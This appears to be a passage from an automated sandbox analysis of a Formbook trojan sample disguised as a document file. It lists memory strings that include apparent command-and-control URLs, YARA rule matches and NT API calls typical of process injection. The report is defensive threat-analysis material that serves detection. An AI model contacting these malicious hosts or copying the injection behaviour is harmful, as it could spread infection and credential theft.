                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Thu, 12 Sep 2024 13:08:03 GMTConnection: closeContent-Length: 315Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: control.exe, 00000006.00000002.4134255300.0000000006170000.00000004.10000000.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4133356305.00000000041A0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cake11298.online/7ew2/?IhkTb=xPfHG0o8kZI8&3tV=IAPJnQ6xP9g
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://cloud.naver.com/
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://files.cloud.naver.com
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://files.cloud.naver.com/CheckUpload.ndrive
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://files.cloud.naver.com/DoDelete.ndrive
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://files.cloud.naver.com/GetList.ndrive
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://files.cloud.naver.com/MakeDirectory.ndrive?
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://files.cloud.naver.com/Status/GenerateKey.ndrive
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://files.cloud.naver.com/Status/Get.ndrive
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1717296789.0000000003420000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://static.nid.naver.com/enclogin/keys.nhnIhttps://nid.naver.com/nidlogin.login
                Source: PASU5160894680 DOCS.scr.exeString found in binary or memory: http://static.nid.naver.com/login.nhn?svc=wme&amp;url=http%3A%2F%2Fwww.naver.com&amp;t=20120425
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: uFLByAWAOFbhtV.exe, 0000000A.00000002.4134964235.0000000005910000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.globyglen.info
                Source: uFLByAWAOFbhtV.exe, 0000000A.00000002.4134964235.0000000005910000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.globyglen.info/tni7/
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722359296.0000000005E10000.00000004.00000020.00020000.00000000.sdmp, PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: control.exe, 00000006.00000002.4134255300.0000000006626000.00000004.10000000.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4133356305.0000000004656000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thinkphp.cn
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: control.exe, 00000006.00000002.4134255300.0000000005E4C000.00000004.10000000.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4133356305.0000000003E7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: control.exe, 00000006.00000002.4132398440.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: control.exe, 00000006.00000002.4132398440.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: control.exe, 00000006.00000002.4132398440.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: control.exe, 00000006.00000002.4132398440.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: control.exe, 00000006.00000002.4132398440.0000000002F59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: control.exe, 00000006.00000002.4132398440.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: control.exe, 00000006.00000002.4132398440.0000000002F59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: control.exe, 00000006.00000003.2023052189.00000000080F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: control.exe, 00000006.00000002.4134255300.0000000006C6E000.00000004.10000000.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4133356305.0000000004C9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.healtheduction.site/2frz/?3tV=l87n7Q89KFkj22mcQvGyKsY8DOdSYtwW2ZIksm0w5n2yQMdP8QPDEmc5KU

                E-Banking Fraud

                Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.1846379339.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000006.00000002.4133191097.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000006.00000002.4133252340.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.1846811096.0000000004D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.1848370775.0000000006CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0042C003 NtClose,4_2_0042C003
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_05612DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_05612C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612B60 NtClose,LdrInitializeThunk,4_2_05612B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056135C0 NtCreateMutant,LdrInitializeThunk,4_2_056135C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05614650 NtSuspendThread,4_2_05614650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05614340 NtSetContextThread,4_2_05614340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612D30 NtUnmapViewOfSection,4_2_05612D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612D00 NtSetInformationFile,4_2_05612D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612D10 NtMapViewOfSection,4_2_05612D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612DD0 NtDelayExecution,4_2_05612DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612DB0 NtEnumerateKey,4_2_05612DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612C60 NtCreateKey,4_2_05612C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612C00 NtQueryInformationProcess,4_2_05612C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612CF0 NtOpenProcess,4_2_05612CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612CC0 NtQueryVirtualMemory,4_2_05612CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612CA0 NtQueryInformationToken,4_2_05612CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612F60 NtCreateProcessEx,4_2_05612F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612F30 NtCreateSection,4_2_05612F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612FE0 NtCreateFile,4_2_05612FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612FA0 NtQuerySection,4_2_05612FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612FB0 NtResumeThread,4_2_05612FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612F90 NtProtectVirtualMemory,4_2_05612F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612E30 NtWriteVirtualMemory,4_2_05612E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612EE0 NtQueueApcThread,4_2_05612EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612EA0 NtAdjustPrivilegesToken,4_2_05612EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612E80 NtReadVirtualMemory,4_2_05612E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612BE0 NtQueryValueKey,4_2_05612BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612BF0 NtAllocateVirtualMemory,4_2_05612BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612BA0 NtEnumerateValueKey,4_2_05612BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612B80 NtQueryInformationFile,4_2_05612B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612AF0 NtWriteFile,4_2_05612AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612AD0 NtReadFile,4_2_05612AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05612AB0 NtWaitForSingleObject,4_2_05612AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05613010 NtOpenDirectoryObject,4_2_05613010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05613090 NtSetValueKey,4_2_05613090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05613D70 NtOpenThread,4_2_05613D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_05613D10 NtOpenProcessToken,4_2_05613D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_056139B0 NtGetContextThread,4_2_056139B0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD35C0 NtCreateMutant,LdrInitializeThunk,6_2_04BD35C0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD4650 NtSuspendThread,LdrInitializeThunk,6_2_04BD4650
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD4340 NtSetContextThread,LdrInitializeThunk,6_2_04BD4340
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04BD2CA0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04BD2C70
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2C60 NtCreateKey,LdrInitializeThunk,6_2_04BD2C60
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04BD2DF0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2DD0 NtDelayExecution,LdrInitializeThunk,6_2_04BD2DD0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04BD2D30
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04BD2D10
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04BD2E80
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04BD2EE0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2FB0 NtResumeThread,LdrInitializeThunk,6_2_04BD2FB0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2FE0 NtCreateFile,LdrInitializeThunk,6_2_04BD2FE0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2F30 NtCreateSection,LdrInitializeThunk,6_2_04BD2F30
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD39B0 NtGetContextThread,LdrInitializeThunk,6_2_04BD39B0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2AF0 NtWriteFile,LdrInitializeThunk,6_2_04BD2AF0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2AD0 NtReadFile,LdrInitializeThunk,6_2_04BD2AD0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04BD2BA0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04BD2BF0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04BD2BE0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2B60 NtClose,LdrInitializeThunk,6_2_04BD2B60
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD3090 NtSetValueKey,6_2_04BD3090
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD3010 NtOpenDirectoryObject,6_2_04BD3010
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2CF0 NtOpenProcess,6_2_04BD2CF0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2CC0 NtQueryVirtualMemory,6_2_04BD2CC0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2C00 NtQueryInformationProcess,6_2_04BD2C00
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2DB0 NtEnumerateKey,6_2_04BD2DB0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD3D10 NtOpenProcessToken,6_2_04BD3D10
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2D00 NtSetInformationFile,6_2_04BD2D00
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD3D70 NtOpenThread,6_2_04BD3D70
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2EA0 NtAdjustPrivilegesToken,6_2_04BD2EA0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2E30 NtWriteVirtualMemory,6_2_04BD2E30
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2FA0 NtQuerySection,6_2_04BD2FA0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2F90 NtProtectVirtualMemory,6_2_04BD2F90
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2F60 NtCreateProcessEx,6_2_04BD2F60
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2AB0 NtWaitForSingleObject,6_2_04BD2AB0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04BD2B80 NtQueryInformationFile,6_2_04BD2B80
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_00C79080 NtAllocateVirtualMemory,6_2_00C79080
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_00C78BF0 NtCreateFile,6_2_00C78BF0
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_00C78D60 NtReadFile,6_2_00C78D60
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_00C78E60 NtDeleteFile,6_2_00C78E60
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_00C78F10 NtClose,6_2_00C78F10
                Source: C:\Windows\SysWOW64\control.exe Code function: 6_2_04A6F19C NtQueryInformationProcess,6_2_04A6F19C
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C5C8976_2_00C5C897
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C5C8A06_2_00C5C8A0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C5CAC06_2_00C5CAC0
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C5AB406_2_00C5AB40
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6E4266_2_04A6E426
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6E7BC6_2_04A6E7BC
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6D7F36_2_04A6D7F3
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6E3056_2_04A6E305
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6D8286_2_04A6D828
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6CAB96_2_04A6CAB9
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6CAC56_2_04A6CAC5
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04A6CAC06_2_04A6CAC0
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04C1F290 appears 103 times
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04BD5130 appears 36 times
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04BE7E54 appears 86 times
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04B8B970 appears 250 times
                Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04C0EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05615130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0564EA12 appears 86 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0565F290 appears 103 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 055CB970 appears 259 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05627E54 appears 107 times
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1720344502.00000000044BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PASU5160894680 DOCS.scr.exe
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1717296789.00000000033C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs PASU5160894680 DOCS.scr.exe
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1710175136.000000000165E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PASU5160894680 DOCS.scr.exe
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1721562024.0000000005910000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs PASU5160894680 DOCS.scr.exe
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000002.1723689341.0000000007CD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PASU5160894680 DOCS.scr.exe
                Source: PASU5160894680 DOCS.scr.exe, 00000000.00000000.1664531081.0000000000FB2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHIPO.exe@ vs PASU5160894680 DOCS.scr.exe
                Source: PASU5160894680 DOCS.scr.exeBinary or memory string: OriginalFilenameHIPO.exe@ vs PASU5160894680 DOCS.scr.exe
                Source: PASU5160894680 DOCS.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
